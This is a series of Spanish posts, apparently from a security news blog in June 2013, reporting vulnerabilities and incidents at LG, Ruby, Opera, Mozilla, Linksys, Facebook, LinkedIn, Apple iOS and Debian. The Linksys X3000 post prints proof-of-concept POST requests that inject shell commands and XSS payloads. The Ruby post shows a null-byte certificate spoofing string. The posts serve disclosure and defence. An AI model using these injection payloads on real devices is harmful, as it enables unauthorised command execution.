domingo, 30 de junio de 2013

LGpwn: Nuevo exploit para rootear móviles Android de LG

El investigador Justin Case (@TeamAndIRC), quien ya liberara un exploit para el Kindle Fire en 2011, ha publicado recientemente una nueva herramienta para poder 'rootear' terminales Android de la firma taiwanesa LG, basándose en una vulnerabilidad del software pre instalado en todos los modelos afectados.

A diferencia de otros casos en los que se consigue explotar una vulnerabilidad del propio terminal o versión del sistema operativo, en este caso se ha explotado un fallo en una utilidad de terceros, que en el caso de LG era redundante, ya que traen de serie una herramienta similar de la propia firma (LG Backup).

La herramienta publicada, denominada LGpwn, se aprovecha de una vulnerabilidad presente en el software que trae de serie el firmware oficial de LG, 'Sprite Backup' de la firma Sprite Software. La utilidad de backup presenta una condición de carrera (CVE-2013-3685) que permitiría ejecutar código arbitrario de manera local y según el escenario, sin que el usuario perciba su ejecución.

IMG del software:

Técnicamente, la vulnerabilidad reside en una falta de políticas de seguridad del demonio 'spritebud', ejecutado como root al iniciarse el terminal y se explotaría a través de un fichero de backup especialmente manipulado, que una vez desempaquetado crea una condición de carrera, propiciando la elevación de privilegios y la ejecución de código.



Las versiones afectadas serían la 2.5.4105 de Sprite Backup o aquellas que contengan el demonio 'spritebud' versión 1.3.24 y anteriores.

Los modelos hasta ahora afectados (más de 40 modelos diferentes), pertenecerían a las siguientes familias de LG:
Lollipop, Mach, Optimus 3D Cube, Optimus 4X HD, Optimus F5, Optimus G, Optimus G Pro, Optimus L7, Optimus L9, Optimus LTE 2, Optimus LTE 3, Optimus LTE Tag, Optimus Vu, Optimus Vu 2, Prada, Prada 3.0

Tanto LG como el fabricante Sprite Software están trabajando en una nueva actualización de su firmware y herramienta respectivamente, que estará disponible próximamente.

Más información

LGPwn - LG Root Exploit

LGpwn APK

Another LG Root exploit



José Mesa Orihuela

sábado, 29 de junio de 2013

Nuevas versiones de Ruby corrigen dos vulnerabilidades remotas

El lenguaje de programación Ruby ha actualizado sus ramas 2.x, 1.9.x y 1.8.x para resolver dos vulnerabilidades remotas que permitirían realizar ataques Man-In-The-Middle o denegaciones de servicio.

La vulnerabilidad CVE-2013-4073, común a todas las versiones indicadas, se debería a un fallo en el cliente SSL encargado de gestionar las conexiones SSL realizadas por las aplicaciones programadas en Ruby, y que permitiría suplantar servidores SSL benignos u oficiales con servidores especialmente manipulados, destinados a usos fraudulentos.

Técnicamente, la función encargada de comprobar la identidad del nombre de servidor SSL, 'OpenSSL::SSL.verify_certificate_identity', no gestiona correctamente aquellos certificados X509 en los que aparezcan valores nulos, dentro del campo SubjectAltName.

Específicamente el error viene provocado por el uso de sprintf() dentro de las funciones para extraer los campos del certificado, que no es particularmente segura a la hora de gestionar valores nulos. Por ello, si se recibe en un certificado un campo del estilo:

"www.hispasec.com\0.servidorfalso.com"

Ruby interpretaría incorrectamente su valor, identificándolo como uno oficial: "www.hispasec.com" pero facilitando la falsificación de certificados entre cliente-servidor SSL y un posible ataque MITM.

La otra vulnerabilidad, sólo presente en la rama 1.8.x, permitiría realizar una denegación de servicio a través de XML.

El parser REXML posee una vulnerabilidad al procesar los nodos de un documento XML y cargar las entidades del mismo, y si éstas son demasiado grandes podría llegar a consumir los recursos del servidor (CVE-2013-1821), a través de un documento XML especialmente manipulado (ataque XML bomb).

Las versiones afectadas que deben ser actualizadas urgentemente son:
Rama 1.8.x anterior a 1.8.7 p374
Rama 1.9.x anterior a 1.9.3 p448
Rama 2.x.x anterior a 2.0.0 p247

Más información:

Hostname check bypassing vulnerability in SSL client (CVE-2013-4073)

Entity expansion DoS vulnerability in REXML (XML bomb, CVE-2013-1821)


José Mesa Orihuela


viernes, 28 de junio de 2013

Windows 8.1 introduce nuevas características de seguridad

Cuando ha empezado la distribución de la beta de Windows 8.1 y a la espera de la publicación definitiva de esta ultima versión del sistema operativo de Microsoft, se empiezan a comentar sus características más destacadas. No cabe duda que lo que más está dando que hablar es el deseado y recuperado botón de inicio. Sin embargo, también cabe destacar que esta última actualización incluye nuevas características de seguridad  sobre las que vamos a centrarnos.

Windows 8.1 incluye características mejoradas en Windows Defender, una función de cifrado de dispositivos o un control de acceso modernizado, con una buena aproximación a la autenticación por huellas digitales o el acceso seguro a los recursos entre otras mejoras.

Microsoft describe el cifrado de dispositivos incluido de forma nativa en Windows 8.1 como una "variante" de BitLocker, la tecnología de cifrado incluida por primera vez en Windows Vista. Las claves de cifrado quedan almacenadas en SkyDrive (que parece que cada vez toma más protagonismo en el ecosistema Microsoft). Esta característica queda activada de forma automática en las tres ediciones de Windows 8.1, sin embargo en las ediciones Pro y Enterprise los administradores de sistema podrán configurarlo con cifrado adicional y administración a través de BitLocker.

La autenticación por huellas dactilares implementado por primera vez en Windows XP también se ha mejorado considerablemente, ya no solo sirve para autenticarse en el sistema, podrá implementarse para abrir o bloquear cualquier aplicación, configuración, el acceso a determinadas carpetas o para comprar en la Windows Store. Esta vez en vez de soportar los lectores de huellas digitales a través de software y controladores de los fabricantes, el soporte se realiza de forma nativa. Pero no solo se ha mejorado el soporte o la funcionalidad, se ha pretendido que la experiencia para el usuario sea mucho mejor y facilitar su uso y velocidad de reconocimiento.

Se ha mejorado el uso de políticas BYOD (Bring your Own Device) para el control de dispositivos personales en entornos de trabajo. Se han introducido características que permiten el borrado remoto de datos corporativos de cualquier dispositivo Windows, mientras que se dejan intactos los datos personales.

Respecto a Windows Defender añadirá monitorización del comportamiento de la red, con objeto de "ayudar a detectar y detener la ejecución de cualquier malware conocido o desconocido". Además Internet Explorer escaneará extensiones de binarios (p.ej. ActiveX) con la solución antimalware antes de cualquier ejecución de código potencialmente peligrosa.

Puede visualizarse una completa presentación sobre la seguridad en Windows 8.1, realizada por Chris Hallum, Product Manager Senior de Microsoft:

Actualmente la beta de Windows 8.1 puede descargarse desde:

Más información:

What’s New For The Enterprise In Windows 8.1


Antonio Ropero
Twitter: @aropero

jueves, 27 de junio de 2013

Roban un certificado a Opera y publican una actualización maliciosa para su navegador

Opera ha anunciado que el pasado 19 de junio sufrió un ataque dirigido sobre su red interna, resultado: robo de un antiguo certificado empleado para firmar código. La compañía reconoce que ha sido usado para firmar malware y que incluso miles de usuarios del navegador (durante un periodo de algo más de media hora) han podido recibir una actualización maliciosa de forma automática.

No es la primera vez que a una importante compañía le roban un certificado digital empleados para la firma de su software, podemos recordar casos como los de Adobe o la compañía antivirus Bit9. Al final el resulto es el mismo, unos atacantes logran firmar malware con un certificado legítimo, lo que puede facilitar su instalación, pasar desapercibido ante algunos antivirus o hacerse pasar por software legítimo sin levantar sospechas. Esto es lo que ha ocurrido recientemente en Opera.

Aunque el aviso de Opera anuncia un impacto limitado, que el ataque fue contenido y sus sistemas revisados, reconocen el robo de un antiguo certificado expirado usado para la firma de código. El portavoz de Opera, Sigbjorn Vik, indicó que el certificado se ha usado para la firma de malware. 
"Esto puede permitirle distribuir software malicioso que aparezca incorrectamente como publicado por Opera Software, o que parezca ser el navegador Opera"
Actualmente se reconoce la existencia de al menos una muestra de malware firmada con este certificado y que actualmente, según VirusTotal, la detectan 23 de 47 antivirus. Lo que puede considerarse aun más grave es que, según la alerta, varios miles de usuarios del navegador Opera en el sistema operativo Microsoft Windows podrían haber sido objeto de una actualización maliciosa de manera automática. El responsable de Opera estima que la ventana de exposición habría sido desde las 01:00 a las 01:36 horario UTC (entre las 3:00 y la 3:36 hora española) del día 19 de junio.

No se aclara en el comunicado si los atacantes llegaron a usar la infraestructura de Opera para liberar la actualización maliciosa, ya que según la ventana de tiempo podría coincidir con el ataque. Otra posibilidad sería que hubiesen comprometido los servidores de nombres de Opera, los cuales se encuentran en su infraestructura, y hubiesen usado un servidor malicioso.

Cabría destacar el hecho de que el ataque haya sido detectado el día 19, al mismo tiempo que la ventana de exposición. Sin embargo este tipo de ataque requiere de cierta complejidad y no sería exagerado pensar que los atacantes podrían haber llevado más tiempo, días tal vez, dentro de su infraestructura.

Opera confirma que liberará una nueva versión del navegador que incluirá un nuevo certificado, por lo que recomiendan encarecidamente que se actualice a la nueva versión tan pronto como esté disponible.

Más información:

Security breach stopped

una-al-dia (13/02/2013) El ataque a Bit9, malware firmado con certificados y otras conclusiones

una-al-dia (30/09/2012) ¿Qué ha pasado con el certificado de Adobe?

8ecbca0de44c82d1c7ffced288aa68c1247bb1255693cd1c5747fb6cef394b43


David García
Twitter: @dgn1729


Antonio Ropero
Twitter: @aropero

miércoles, 26 de junio de 2013

Mozilla corrige 17 vulnerabilidades en Firefox y Thunderbird

Mozilla Foundation ha publicado 14 boletines de seguridad pertenecientes a la nuevas versiones de Mozilla Firefox 22.0 y Thunderbird 17.0.7, en los que corrigen 14 vulnerabilidades. Se agrupan en cuatro boletines de nivel crítico, seis clasificados como alto, tres moderados y uno de nivel bajo. 

A continuación resumimos los boletines publicados según su nivel de importancia.

  • De nivel Crítico, cuatro boletines con 7 vulnerabilidades que podrían ser aprovechadas por un atacante remoto para ejecutar código arbitrario:


MFSA 2013-53: Existiría un error no especificado en el evento 'onreadystatechange' que podría generar un desbordamiento de memoria (CVE-2013-1690).

MFSA 2013-51: Existe una falta de políticas de seguridad a la hora de controlar las funciones de usuario definidas en los XBL, que permitirían acceder a contenido protegido como los 'System Only Wrappers' (SOW) (CVE-2013-1687).

MFSA 2013-50: Diferentes errores provocados al intentar acceder a objetos en memoria ya liberados, lo que genera un desbordamiento de memoria basado en HEAP (localizados gracias a la utilidad 'Address Sanitizer'). (CVE-2013-1684, CVE-2013-1685 y CVE-2013-1686).

MFSA 2013-49: Diferentes desbordamientos de memoria (CVE-2013-1682 y CVE-2013-1683)

  • De nivel Alto: Seis boletines con seis vulnerabilidades que podrían ser aprovechadas por un atacante remoto para ejecutar código arbitrario o elevación de privilegios.


MFSA 2013-62: Elevación de privilegios local a través del servicio 'Mozilla Maintenance Service' de Windows cuando no es accesible el ejecutable principal (CVE-2013-1700).

MFSA 2013-59: Debido a un fallo en las políticas de seguridad de 'XrayWrappers', puede ser evadido para llamar a métodos fuera del contexto de usuario (CVE-2013-1697).

MFSA 2013-56: Salto de restricciones a través de 'PreserveWrapper' (CVE-2013-1694).

MFSA 2013-55: Se podría utilizar el filtro SVG, para revelar información mediante un 'timing attack' (CVE-2013-1693).

MFSA 2013-54: Incorrecta implementación de las especificaciones XHR, al enviarse datos en el cuerpo durante una petición HEAD 'XMLHttpRequest' (CVE-2013-1692). Esto podría ser utilizado por un atacante remoto para realizar un ataque cross-site request forgery (CSRF)

MFSA 2013-52: Ejecución de código a través de la interfaz de la función 'Profiler' (CVE-2013-1688)

  • De nivel Moderado, en su mayoría saltos de restricciones:


MFSA 2013-61: Insuficiente política de seguridad en el algoritmo de clasificación de dominios IDN (CVE-2013-1699). Esto podría ser utilizado por un atacante remoto para suplantar dominios oficiales mediante nombres de dominio homógrafos (IDN homograph attack).

MFSA 2013-60: Salto de restricciones a través de 'getUserMedia' (CVE-2013-1698) que permitiría tener acceso a dispositivos del sistema como el micrófono o webcam.

MFSA 2013-58: Salto de restricciones a través de 'X-Frame-Options' durante transacciones de servidor multi-part (CVE-2013-1696) y utilizable en ataques de tipo 'clickjacking'.

  • Y finalmente de nivel bajo:


MFSA 2013-57: Salto de restricciones a través de elementos de marco contenidos en 'iframe sandbox' (CVE-2013-1695) Se recomienda actualizar a las versiones disponibles a través de los canales habituales o mediante las actualizaciones automáticas.

Más información:

MFSA 2013-62 Inaccessible updater can lead to local privilege escalation
MFSA 2013-61 Homograph domain spoofing in .com, .net and .name
MFSA 2013-60 getUserMedia permission dialog incorrectly displays location
MFSA 2013-59 XrayWrappers can be bypassed to run user defined methods in
a privileged context
MFSA 2013-58 X-Frame-Options ignored when using server push with
multi-part responses
MFSA 2013-57 Sandbox restrictions not applied to nested frame elements
MFSA 2013-56 PreserveWrapper has inconsistent behavior
MFSA 2013-55 SVG filters can lead to information disclosure
MFSA 2013-54 Data in the body of XHR HEAD requests leads to CSRF attacks
MFSA 2013-53 Execution of unmapped memory through onreadystatechange event
MFSA 2013-52 Arbitrary code execution within Profiler
MFSA 2013-51 Privileged content access and execution via XBL
MFSA 2013-50 Memory corruption found using Address Sanitizer
MFSA 2013-49 Miscellaneous memory safety hazards (rv:22.0 / rv:17.0.7)


José Mesa Orihuela

martes, 25 de junio de 2013

Múltiples vulnerabilidades en router Linksys X3000

El investigador de seguridad Michael Messner ha descubierto varios fallos de seguridad en el modelo X3000 de router WiFi de la marca Linksys de Cisco. Estas vulnerabilidades permiten la ejecución de código remoto a través de la inyección de comandos en el sistema operativo subyacente, cross-site scripting y posibilidad de cambiar la contraseña sin preguntar por la contraseña actual.

Inyección de comandos
Se aprovecha la falta de validación en el contenido suministrado por el usuario en los campos ping_ip y Add_Account_Password. Las siguientes peticiones POST pueden servir como prueba de concepto:

  • Parámetro ping_ip de la página Diagnostics.asp:

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=%3b%20ping%20-c%201%20192%2e168%2e1%2e147%20%3b&ping_size=&ping_times=5&traceroute_ip=

  • Parámetro Add_Account_Password de la página User_Properties.asp:

command=device_data&cur_ipaddr=192.168.178.188&next_page=StorageAdminUserAdd1.htm&redirect_timer=1&reboot=0&data1=&next_page=&submit_button=User_Properties&submit_type=create_user&change_action=gozila_cgi&Add_Account_Group_Name=&access_group_name=&delete_groups=&Modify_Account_Name=&Add_Account_Name=pwnd&full_name=pwnd&user_desc=pwnd&Add_Account_Password=`ping%20192%2e168%2e178%2e103`&Add_Account_PasswordConfirm=pwnd&Add_Account_Group=admin

Con estas peticiones conseguimos ejecutar en el sistema el comando ping.

XSS no persistente
También falta de validación en los parámetros ping_ip, sortby y submit_button.

  • Parámetro ping_ip de la página Diagnostics.asp:

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=1.1.1.1'><script>alert(1)</script>&ping_size=32&ping_times=5&traceroute_ip=

  • Parámetro sortby de la página DHCPTable.asp:

submit_button=DHCPTable&change_action=&submit_type=&small_screen=&ip=&mac=&if_name=&nowait=1&sortby=mac"%3balert(1)//

  • Parámetro submit_button de la página WanMAC.asp:

submit_button=WanMAC'%3balert(1)//&change_action=&submit_type=&action=Apply&wait_time=3&mac_clone_enable=0

Estas vulnerabilidades han sido solucionas en el firmware v1.0.05 build 002 Feb 21,2013

Más información:

Linksys X3000 - Multiple Vulnerabilities

Wireless-N ADSL 2+ Modem Router (X3000)


Fernando Castillo

lunes, 24 de junio de 2013

Fallo de seguridad en Facebook revela la información de contacto de 6 millones de usuarios

El equipo de seguridad de Facebook gracias al programa "White Hat" de revelación responsable de vulnerabilidades, ha solucionado un fallo que podía revelar la dirección de correo electrónico y el número de teléfono de usuarios con los que tenemos alguna información de contacto o conexión.

Básicamente, cuando subimos a Facebook nuestra lista de contactos estos datos se cotejan con la información de contacto de otros usuarios ya existentes para generar las recomendaciones de amistad. Esta información usada para las sugerencias se almacenaba en nuestra cuenta de usuario, y a través de la herramienta Download Your Information (DYI) de la propia Facebook, usada para descargar tu información personal, era posible descargar también los emails y teléfonos de dicha personas.

La herramienta se deshabilitó nada más conocer el fallo y se parcheó al día siguiente, se concluye que la información de contacto de 6 millones de usuarios ha podido ser descargada por otros. Aunque el equipo de Facebook ha querido recalcar que el impacto de revelación es mínimo ya que esta información ya era conocida por aquellos usuarios o por algunos con los que se tiene conexión.

El fallo se ha subsanado, no se tiene constancia de que haya sido explotado de forma maliciosa. Facebook está contactando con los posibles usuarios afectados por correo electrónico.

Más información:

Important Message from Facebook's White Hat Program

White Hat progam

How can I download my information from Facebook?


Fernando Castillo

domingo, 23 de junio de 2013

Lección 4 del curso "Privacidad y Protección de Comunicaciones Digitales" en el MOOC Crypt4you: "Protección de comunicaciones en dispositivos móviles"

Dentro del curso gratuito de Privacidad y Protección de Comunicaciones Digitales que se encuentra en el MOOC Crypt4you, se publica la Lección 4 "Protección de comunicaciones en dispositivos móviles", a cargo de los profesores invitados David Pérez, José Picó y Raúl Siles, de la empresa Taddong.

Los dispositivos móviles constituyen uno de los principales, si no el principal, medio de comunicación que utilizamos en la actualidad. Cada vez son utilizados por más personas, y cada vez se emplean en un mayor número de escenarios y ámbitos diferentes, desde el ocio personal, hasta el acceso a datos corporativos con un alto nivel de confidencialidad, pasando por multitud de aplicaciones de uso cotidiano, como el acceso al correo electrónico o a las redes sociales y la navegación por Internet. En esta lección los expertos de Taddong nos introducen al apasionante mundo de la protección de las comunicaciones móviles NFC, Bluetooth, Wi-Fi y 2G/3G.

Lección 4. Protección de comunicaciones en dispositivos móviles
     Apartado 1. Introducción
     Apartado 2. Recomendaciones de seguridad generales
     Apartado 3. Protección de comunicaciones NFC
     Apartado 4. Protección de comunicaciones Bluetooth
     Apartado 5. Protección de comunicaciones Wi-Fi
     Apartado 6. Protección de comunicaciones móviles 2G/3G (voz, SMS y datos)

Accesos directos:
Lección 4 Protección de comunicaciones en dispositivos móviles

Cursos en MOOC Crypt4you: Privacidad y Protección de Comunicaciones Digitales (actual) y El Algoritmo RSA (terminado)

Se recuerda que el formato del MOOC Crypt4you es dinámico y, por tanto, el contenido de las lecciones puede experimentar cambios, siendo posible la inclusión de nuevas lecciones o bien la reordenación de las mismas dentro del índice publicado.

La siguiente entrega del MOOC será la Lección 5 "Protección de comunicaciones en redes sociales", a cargo del experto invitado Lord Epsylon.


Jorge Ramió, Alfonso Muñoz
Editores de Crypt4you

sábado, 22 de junio de 2013

El supuesto ataque a los DNS de LinkedIn

El pasado 20 de junio algunos usuarios de la red social LinkedIn advirtieron de un sospechoso cambio en los DNS usados por la compañía. Cuando intentaban visitar el sitio web de LinkedIn este no respondía debido a que el nombre de dominio no estaba apuntando a los servidores de LinkedIn.

Los DNS de LinkedIn, gestionados por Network Solutions fueron reemplazados por servidores de nombres del dominio ztomy.com los cuales resolvían 'www.linkedin.com' a la IP 204.11.56.17. Dicha IP pertenece al rango 204.11.56.0/24 gestionado por Confluence-Networks. Se da la circunstancia además que dicha compañía se encuentra en una lista negra (http://hostexploit.com/) de servidores que envían spam y/o alojan sitios con contenido phishing.

Eso hizo que muchos usuarios temieran que los DNS de LinkedIn habían sido secuestrados para robar credenciales debido a que un navegador confía en el dominio para enviar las cookies de sesión hacia el servidor web. Pensaron que la conexión se efectuaba sobre el puerto 80 del servidor erróneo, en lugar del canal seguro habitual, y que los datos de sesión viajarían en texto claro. Esto último no debería haber ocurrido ya que las cookies de sesión de LinkedIn están marcadas como "Secure" y no deberían ser enviadas a través de un canal no cifrado (puerto 80).

Esto último ya de por si llamaba la atención. Si en realidad hubiesen querido "cazar" credenciales deberían haber montado un sitio falso (phishing) sobre el que el usuario debería haberse autenticado.

Aunque LinkedIn fuese el sitio sobre el que la noticia saltó, poco a poco se advirtió que el supuesto ataque afectaba a más dominios. En concreto, y según comentó Jaeson Schultz de Cisco, casi 5.000 dominios registrados con Network Solutions presentaban el mismo problema, todos eran resueltos a la red 204.11.56.0/24.

Mientras la red se iba llenando de comentarios acerca del supuesto ataque e informaciones que se contradecían, finalmente, Confluence-Network publicó un comunicado en su página indicando que habían sido informados de lo sucedido y que estaban trabajando conjuntamente con los afectados para tratar de encontrar una solución al problema.

Finalmente la otra parte afectada, Network Solutions, comunicaba que se trataba de un error humano y no de un ataque. Al parecer Network Solutions estaba siendo víctima de un ataque distribuido de denegación de servicio y posiblemente mientras trataban de aplicar alguna contramedida configuraron erróneamente los registros que gestionan causando la resolución errónea de miles de dominios de sus clientes.

Más información:

Important Update for Network Solutions Customers Experiencing Website Issues

‘Hijacking’ of DNS Records from Network Solutions



David García

viernes, 21 de junio de 2013

Microsoft pagará hasta 150.000 dólares por nuevas vulnerabilidades

Microsoft ha anunciado que al igual que otras compañías como Google, Mozilla o Facebook, también pagará por el anuncio responsable de vulnerabilidades. Lo más destacable son las cantidades ofrecidas que pueden llegar hasta los 150.000 dólares por una vulnerabilidad de ejecución de código junto con el remedio para evitarla. 

El 26 de junio la compañía de Redmond pondrá en marcha tres programas denominados "Mitigation Bypass Bounty", "BlueHat Bonus for Defense" y "Internet Explorer 11 Preview Bug Bounty". Cada uno de ellos con unas características, objetivos y premios diferentes. Si bien la pega que se puede encontrar es que todos ellos están únicamente destinados a los productos más nuevos de la compañía como Windows 8.1 Preview e Internet Explorer 11 Preview.

Bajo el programa "Mitigation Bypass Bounty" Microsoft pagará hasta 100.000 dólares por nuevas técnicas de explotación contra las protecciones incluidas en la última versión de su sistema operativo (Windows 8.1 Preview). De forma adicional, se anuncia el programa "BlueHat Bonus for Defense", bajo el que se ofrecen hasta 50.000 dólares más por ofrecer ideas defensivas para con las vulnerabilidades encontradas. De esta forma, la recompensa podría llegar a los 150.000 dólares.

Por otra parte se incluye también el programa "Internet Explorer 11 Preview Bug Bounty" por el que se ofrecen recompensas de hasta 11.000 dólares por vulnerabilidades críticas que afecten a Internet Explorer 11 Preview sobre la última versión de Windows (Windows 8.1 Preview). Este programa solo funcionará durante los primeros 30 días del periodo beta de Internet Explorer 11 (del 26 de junio al 26 de julio de 2013).

Para Internet Explorer 11 presentan la siguiente tabla de recompensas:

Tipo de Vulnerabilidad
Crash dump
Prueba de concepto
Exploit operativo
White paper
Sandbox escape
Nivel de Recompensa
Vulnerabilidad de ejecución de código remoto
No requerido
Requerido
Requerido
requerido
Requerido
Nivel 0
Puede exceder  11.000 $
No requerido
Requerido
Requerido
Requerido
No Requerido
No requerido
Requerido
Requerido
Opcional
No Requerido
Nivel 1
Pago máximo 11.000 $
No requerido
Requerido
n/a
Opcional
No Requerido
Nivel 2
Pago mínimo 1.100 $
Vulnerabilidad de gravedad importante o alta a nivel de diseño
No requerido
Requerido
Es suficiente la prueba de concepto
Opcional
No Requerido
Problema de seguridad con implicaciones de privacidad
No requerido
Requerido
No Requerido
Opcional
No Requerido
Vulnerabilidad de fuga de la Sandbox
No requerido
Requerido
Opcional
Opcional
Requerido
Vulnerabilidad de divulgación de información ASLR
No requerido
Requerido
-
Opcional
-
Nivel 3
Pago mínimo 500 $

Estas campañas de recompensas de Microsoft son sin duda una gran propuesta, evidentemente la compañía quiere conseguir que su nuevo sistema operativo sea robusto y estos incentivos pueden conseguir que los investigadores se centren en el descubrimiento de cualquier problema de seguridad que pueda afectar a Windows 8.1 y a la nueva versión de su navegador. Pero tampoco parece muy indicado dejar fuera de cualquier recompensa a las vulnerabilidades en otros productos o sistemas operativos anteriores.

Más información:

Microsoft Security Bounty Programs

Mitigation Bypass and BlueHat Defense Guidelines

Internet Explorer 11 Preview Program Guidelines

New Bounty Program Details

Heart of Blue Gold – Announcing New Bounty Programs


Antonio Ropero
Twitter: @aropero


jueves, 20 de junio de 2013

¿Usas tu iPhone como punto de acceso WiFi?

Investigadores de la universidad alemana de Friedrich-Alexander han descubierto como genera iOS la clave por defecto cuando se activa la conexión de red compartida.

Cuando necesitamos que nuestro terminal móvil actúe de proveedor de acceso a red creamos, mediante la opción de "Compartir Internet", un punto de acceso WiFI como el que tendríamos en casa. Si no indicamos una clave de acceso o técnicamente una PSK (Pre-shared Key) nuestro teléfono creará una por defecto para nuestra comodidad.

En iOS, cuando dicha clave es generada por el sistema esta se compone de una palabra de entre 4 y 6 caracteres seguida de una cifra de cuatro dígitos. Por ejemplo: rich3137.

Hasta aquí los investigadores encontraron una primera debilidad. La estructura de la clave de acceso generada es débil si se efectúa un ataque de fuerza bruta sobre un WPA handshake, la fase de negociación de la conexión entre cliente y punto de acceso configurado con cifrado WPA.

Si este proceso es capturado por un atacante, este podría ejercer un ataque de fuerza bruta sobre los paquetes capturados e intentar averiguar la clave de acceso o PSK de ese punto de acceso.

El problema se agrava cuando descubrieron que la palabra que va delante del grupo de cuatro dígitos no es aleatoria. Mediante el reseteo continuo del punto de acceso, los investigadores fueron anotando las palabras usadas para componer la clave de acceso y advirtieron que podrían provenir de un diccionario también usado por un videojuego denominado "Scrabble". Este diccionario contiene 52.500 entradas y fue usado con un porcentaje total de éxito para extraer la clave de acceso.

No contentos con el resultado, ya que les parecía excesiva la longitud del diccionario comparada con la frecuencia de aparición de palabras en la clave, tracearon la llamada al sistema "open()" y observaron algo realmente curioso.

Para escoger la palabra, iOS reusa el mecanismo de "sugerencia" que aparece en los cuadros de entrada de texto, el mismo que va sugiriendo palabras a medida que vamos añadiendo caracteres. A continuación se invoca un método del Framework "ProofReader" usado para la corrección ortográfica. Dicho método permite obtener una palabra inglesa de entre 4 y 6 caracteres de longitud.

Ya que obtuvieron el método con el que iOS va generando palabras usaron el mismo mecanismo en un programa aislado. Se generó una gran cantidad de palabras y observaron como estadísticamente, después de 250.000 invocaciones, el número de palabras se estabilizaba en una distribución de 1.842 palabras distintas.

Junto con esta lista de palabras y el número de cuatro cifras añadido al final consiguieron acotar el espacio de búsqueda en un número relativamente pequeño: 1.842*104. Esto supone reducir el tiempo de búsqueda a menos de 50 segundos usando una sola GPU de última generación.

Los investigadores recomiendan no usar la clave de acceso por defecto y en su lugar establecer una fuerte generada por el usuario.

Más información:

Usability vs. Security: The Everlasting Trade-Off in the Context of Apple iOS Mobile Hotspots

Mobile Hotspots



David García

miércoles, 19 de junio de 2013

Tercera lección del curso de privacidad y protección de comunicaciones digitales en MOOC Crypt4you "Comunicaciones seguras mediante mensajería instantánea"

Dentro del curso gratuito de Privacidad y Protección de Comunicaciones Digitales que se encuentra en el MOOC Crypt4you, se publica la Lección 3 "Comunicaciones seguras mediante mensajería instantánea", a cargo del experto invitado Luis Delgado, Consultor de seguridad independiente, involucrado en proyectos del sector de defensa, entidades financieras e importantes ISPs.

Hoy día las comunicaciones instantáneas están cada vez más presentes en nuestra vida cotidiana. Aplicaciones como Skype, Whastapp o Google Talk, tienen millones de usuarios en todo el mundo. En esta lección que nos ha preparado el profesor invitado Luis Delgado, se profundiza en los protocolos y herramientas más comunes en comunicaciones instantáneas, destacando diferentes aspectos de privacidad de la información, suplantación de los interlocutores, etc. Comprobarás como existen opciones para hacer tus comunicaciones instantáneas más seguras, lejos de miradas indiscretas.

Lección 3: Comunicaciones seguras mediante mensajería instantánea
     Apartado 1. Introducción
     Apartado 2. Arquitectura general
     Apartado 3. Protocolo MSNP
     Apartado 4. Skype
     Apartado 5. Protocolo OSCAR
     Apartado 6. Protocolo YMSG
     Apartado 7. Ejemplos de protocolos seguros que han sido propuestos
     Apartado 8. Análisis de seguridad
     Apartado 9. XMPP
     Apartado 10. OTR
     Apartado 11. PIDGIN
     Apartado 12. Referencias

Accesos directos:
Lección 3:
Comunicaciones seguras mediante mensajería instantánea
MOOC Crypt4you (2 cursos: Privacidad y Protección de Comunicaciones Digitales y El Algoritmo RSA)
Se recuerda que el formato del MOOC Crypt4you es dinámico y, por tanto, el contenido de las lecciones puede experimentar cambios, siendo posible la inclusión de nuevas lecciones o bien la reordenación de las mismas dentro del índice publicado.

La siguiente entrega del curso será la Lección 4. "Protección de comunicaciones en dispositivos móviles", a cargo de expertos invitados de la empresa Taddong.


Jorge Ramió, Alfonso Muñoz
Editores de Crypt4you

martes, 18 de junio de 2013

Debian aconseja no confiar en el dominio debian-multimedia.org

El dominio no-oficial de software de terceros "debian-multimedia.org" fue abandonado hace unos meses por sus administradores. Posteriormente, el dominio expiró y fue registrado el día 1 de enero de este año por alguien ajeno a la organización Debian y desconocido por estos.

Anteriormente el dominio era usado para apuntar al repositorio no oficial de software multimedia para Debian. Tras una discusión en la lista de mantenedores de paquetes se llegó a un acuerdo para que no se usara el dominio "debian-multimedia.org" y pasara a usarse el dominio "deb-multimedia.org".

Sin embargo, el dominio anterior podría encontrarse en la lista de fuentes de paquetes (source.list) de muchas distribuciones, sobre todo antiguas. Debido a que las intenciones del nuevo propietario del dominio no se conocen, Debian ha optado por alertar a sus usuarios e insta a borrar la entrada correspondiente en el archivo de fuentes de paquetes.

Un repositorio que se encuentre en el archivo sources.list y no sea controlado por alguien de la organización o reconocido por ellos, como es el caso, es totalmente inseguro ya que se podría utilizar para distribuir malware. Es por esto que Debian recomienda eliminar las ĺíneas concernientes a este repositorio del archivo sources.list.

En primer lugar, para comprobar si se tiene, se podría ejecutar esta orden en el terminal:

grep -i debian-multimedia.org /etc/apt/sources.list 
/etc/apt/sources.list.d/*

Si devuelve algo (debian-multimedia.org), quiere decir que existe un archivo con este repositorio en alguna de sus líneas y debería ser eliminado.

Se recuerda también que no solo la distribución Debian está afectada ya que existen multitud de distribuciones basadas en Debian que aprovechan los mismos repositorios de paquetes e incluso podrían contener la entrada mencionada en el archivo sources.list.

Más información:

Debian - Remove unofficial debian-multimedia.org repository from your sources

on package duplication between Debian and debian-multimedia

Software distributions based on Debian



David García

Antonio Sánchez
asanchez@hispasec.com

lunes, 17 de junio de 2013

Actualización fuera de ciclo para Java

Oracle se dispone a liberar un paquete de parches de seguridad para Java el próximo 18 de junio, fuera de su ciclo habitual cada tres meses. El motivo, como menciona Oracle, se debe a que al menos uno de los fallos está siendo activamente explotado con éxito.

37 de las 40 vulnerabilidades están calificadas con una puntuación de 10 en la escala CVSS. Es decir, su explotación conlleva la ejecución de código arbitrario en el equipo. Típicamente, las vulnerabilidades encontradas en Java son explotadas a través de applets incrustados en páginas webs comprometidas. La visita de estas páginas supone la explotación e infección de un equipo cuya versión de Java no esté actualizada o que no disponga de las políticas de restricción adecuadas que impidan la ejecución de applets no confiables.

Estas 40 vulnerabilidades se suman a las 97 que lleva corregidas en lo que va de año. Cabe recordar que 2012 se cerró con un total de 58. Oracle ya desveló un cambio en la política de seguridad concerniente a Java, tal y como dijo Nandini Ramani (Jefe del equipo de desarrollo de Java) el pasado 30 de mayo.

